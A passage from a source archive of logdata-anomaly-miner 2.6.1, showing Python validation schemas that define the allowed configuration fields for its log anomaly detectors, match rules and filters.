'boolean', 'default': True}, 'date_format': {'type': 'string', 'minlength': 2}, 'text_locale': {'type': 'string', 'nullable': True, 'default': None}, 'max_time_jump_seconds': {'type': 'integer', 'default': 86400}, 'timestamp_scale': {'type': 'integer', 'default': 1}, 'allow_all_fields': {'type': 'boolean', 'default': False} } } }, } logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/000077500000000000000000000000001437606560100327645ustar00rootroot00000000000000AnalysisValidationSchema.py000066400000000000000000001441061437606560100402040ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'Analysis': { 'required': False, 'type': 'list', 'nullable': True, 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AllowlistViolationDetector'], 'required': True}, 'allowlist_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchPathFilter'], 'required': True}, 'parsed_atom_handler_lookup_list': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'nullable': True}}, 'required': True}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueFilter'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'parsed_atom_handler_dict': { 'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': 'string'}}, 'required': True}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True}, 'type': {'type': 'string', 'allowed': ['PCADetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'min_anomaly_score': {'type': 'float'}, 'min_variance': {'type': 'float'}, 'num_windows': {'type': 'float'}, 'persistence_id': {'type': 'string'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EnhancedNewMatchPathValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'tuple_transformation_function': {'type': 'string', 'allowed': ['demo'], 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventCorrelationDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'max_hypotheses': {'type': 'integer', 'min': 1}, 'hypothesis_max_delta_time': {'type': 'float', 'min': 0.01}, 'generation_probability': {'type': 'float', 'min': 0, 'max': 1}, 'generation_factor': {'type': 'float', 'min': 0, 'max': 1}, 'max_observations': {'type': 'integer', 'min': 1}, 'p0': {'type': 'float', 'min': 0, 'max': 1}, 'alpha': {'type': 'float', 'min': 0, 'max': 1}, 'candidates_size': {'type': 'integer', 'min': 1}, 'hypotheses_eval_delta_time': {'type': 'float', 'min': 0.01}, 'delta_time_to_discard_hypothesis': { 'type': 'float', 'min': 0.01, 'bigger_than_or_equal': ['hypotheses_eval_delta_time', 120.0]}, 'check_rules_flag': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventFrequencyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'scoring_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'unique_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'num_windows': {'type': 'integer'}, 'empty_window_warnings': {'type': 'boolean'}, 'early_exceeding_anomaly_output': {'type': 'boolean'}, 'set_lower_limit': {'type': 'integer', 'min': 0, 'nullable': True}, 'set_upper_limit': {'type': 'integer', 'min': 0, 'nullable': True}, 'confidence_factor': {'type': 'float', 'min': 0, 'max': 1}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventCountClusterDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'num_windows': {'type': 'integer'}, 'confidence_factor': {'type': 'float', 'min': 0, 'max': 1}, 'idf': {'type': 'boolean'}, 'norm': {'type': 'boolean'}, 'add_normal': {'type': 'boolean'}, 'check_empty_windows': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventSequenceDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'seq_len': {'type': 'integer', 'min': 1}, 'timeout': {'type': 'integer', 'min': -1}, 'allow_missing_id': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueRangeDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['CharsetDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EntropyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'prob_thresh': {'type': 'float'}, 'default_freqs': {'type': 'boolean'}, 'skip_repetitions': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventTypeDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'id_path_list': {'type': 'list', 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'allowed_id_tuples': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True}, 'min_num_vals': {'type': 'integer', 'min': 1}, 'max_num_vals': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['min_num_vals', 1000]}, 'save_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SlidingEventFrequencyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'scoring_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'set_upper_limit': {'type': 'integer', 'min': 0, 'nullable': True}, 'local_maximum_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['LinearNumericBinDefinition'], 'required': True}, 'lower_limit': {'type': ['integer', 'float'], 'required': True}, 'bin_size': {'type': 'integer', 'required': True, 'min': 1}, 'bin_count': {'type': 'integer', 'required': True, 'min': 1}, 'outlier_bins_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ModuloTimeBinDefinition'], 'required': True}, 'modulo_value': {'type': ['integer', 'float'], 'required': True, 'min': 0.000001}, 'time_unit': {'type': 'integer', 'required': True, 'min': 1}, 'lower_limit': {'type': ['integer', 'float'], 'required': True, 'min': 0}, 'bin_size': {'type': 'integer', 'required': True, 'min': 1}, 'bin_count': {'type': 'integer', 'required': True, 'min': 1}, 'outlier_bins_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['HistogramAnalysis'], 'required': True}, 'histogram_defs': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'required': True}, 'report_interval': {'type': 'integer', 'required': True, 'min': 1}, 'reset_after_report_flag': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathDependentHistogramAnalysis'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'bin_definition': {'type': 'string', 'required': True, 'empty': False}, 'report_interval': {'type': 'integer', 'required': True, 'min': 1}, 'reset_after_report_flag': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchFilter'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'value_list': { 'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueAverageChangeDetector'], 'required': True}, 'timestamp_path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'min_bin_elements': {'type': 'integer', 'required': True, 'min': 1}, 'min_bin_time': {'type': 'integer', 'required': True, 'min': 1}, 'debug_mode': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueStreamWriter'], 'required': True}, 'stream': {'type': 'string', 'allowed': ['sys.stdout', 'sys.stderr'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'separator': {'type': 'string', 'required': True}, 'missing_value_string': {'type': 'string', 'required': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MissingMatchPathValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'combine_values': {'type': 'boolean'}, 'check_interval': {'type': 'integer', 'min': 1}, 'realert_interval': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['check_interval', 3600]}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MissingMatchPathListValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'combine_values': {'type': 'boolean'}, 'check_interval': {'type': 'integer', 'min': 1}, 'realert_interval': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['check_interval', 3600]}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchIdValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'id_path_list': {'type': 'list', 'required': True}, 'min_allowed_time_diff': {'type': 'float', 'required': True, 'min': 0.01}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ParserCount'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'report_interval': {'type': 'integer', 'min': 1}, 'labels': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'split_reports_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventGenerationMatchAction'], 'required': True}, 'event_type': {'type': 'string', 'required': True}, 'event_message': {'type': 'string', 'required': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AtomFilterMatchAction'], 'required': True}, # this is optional on purpose. If not used, the default atom_filter is used. 'subhandler_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'stop_when_handled_flag': {'type': 'boolean'}, 'delete_components': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AndMatchRule', 'OrMatchRule', 'ParallelMatchRule'], 'required': True}, 'sub_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'match_action': {'type': 'string', 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueDependentDelegatedMatchRule'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'rule_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'string'}, 'required': True}, 'default_rule': {'type': 'string', 'nullable': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NegationMatchRule'], 'required': True}, 'sub_rule': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathExistsMatchRule', 'IPv4InRFC1918MatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'value': {'type': ['boolean', 'float', 'integer', 'string'], 'required': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueListMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'value_list': {'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'required': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueRangeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'lower_limit': {'type': ['integer', 'float'], 'required': True}, 'upper_limit': {'type': ['integer', 'float'], 'required': True, 'bigger_than_or_equal': ['lower_limit', None]}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['StringRegexMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'regex': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ModuloTimeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'seconds_modulo': {'type': 'integer', 'required': True, 'min': 1}, 'lower_limit': {'type': ['integer', 'float'], 'required': True, 'min': 0}, 'upper_limit': { 'type': ['integer', 'float'], 'required': True, 'min': 0, 'bigger_than_or_equal': ['lower_limit', None]}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueDependentModuloTimeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'seconds_modulo': {'type': 'integer', 'required': True, 'min': 1}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'limit_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'list', 'schema': { 'type': ['integer', 'float'], 'min': 0}}, 'required': True}, 'default_limit': {'type': 'list', 'schema': {'type': 'integer', 'min': 0}, 'nullable': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['DebugMatchRule', 'DebugHistoryMatchRule'], 'required': True}, 'debug_mode': {'type': 'boolean'}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimeCorrelationDetector'], 'required': True}, 'parallel_check_count': {'type': 'integer', 'required': True, 'min': 1}, 'record_count_before_event': {'type': 'integer', 'min': 1}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'use_path_match': {'type': 'boolean'}, 'use_value_match': {'type': 'boolean'}, 'min_rule_attributes': {'type': 'integer', 'min': 1}, 'max_rule_attributes': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['min_rule_attributes', 1]}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimeCorrelationViolationDetector'], 'required': True}, 'ruleset': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'type': {'type': 'string', 'allowed': ['CorrelationRule'], 'required': True}, 'rule_id': {'type': 'string', 'required': True, 'empty': False}, 'min_time_delta': {'type': 'integer', 'required': True, 'min': 1}, 'max_time_delta': {'type': 'integer', 'required': True, 'min': 1, 'bigger_than_or_equal': ['min_time_delta', None]}, 'artefact_match_parameters': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'nullable': True} }, { 'type': {'type': 'string', 'allowed': ['EventClassSelector'], 'required': True}, 'action_id': {'type': 'string', 'required': True, 'empty': False}, 'artefact_a_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'artefact_b_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimestampsUnsortedDetector'], 'required': True}, 'exit_on_error_flag': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['VariableCorrelationDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'num_init': {'type': 'integer', 'min': 1}, 'num_update': {'type': 'integer', 'min': 1}, 'disc_div_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_steps_create_new_rules': {'type': 'integer', 'min': 1}, 'num_upd_until_validation': {'type': 'integer', 'min': 1}, 'num_end_learning_phase': {'type': 'integer', 'min': 1}, 'check_cor_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'check_cor_prob_thres': {'type': 'float', 'min': 0.000001}, 'check_cor_num_thres': {'type': 'integer', 'min': 1}, 'min_values_cors_thres': {'type': 'integer', 'min': 1}, 'new_vals_alarm_thres': {'type': 'float', 'min': 0.000001}, 'num_bt': {'type': 'integer', 'min': 1}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_homogeneity_test': {'type': 'string', 'allowed': ['Chi', 'MaxDist']}, 'alpha_chisquare_test': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'max_dist_rule_distr': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_presel_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']}, 'nullable': True}, 'intersect_presel_meth': {'type': 'boolean'}, 'percentage_random_cors': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'match_disc_vals_sim_tresh': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'exclude_due_distr_lower_limit': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'match_disc_distr_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': ['Rel', 'WRel']}, 'nullable': True}, 'used_validate_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'coverVals', 'distinctDistr']}, 'nullable': True}, 'validate_cor_cover_vals_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'validate_cor_distinct_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['VariableTypeDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 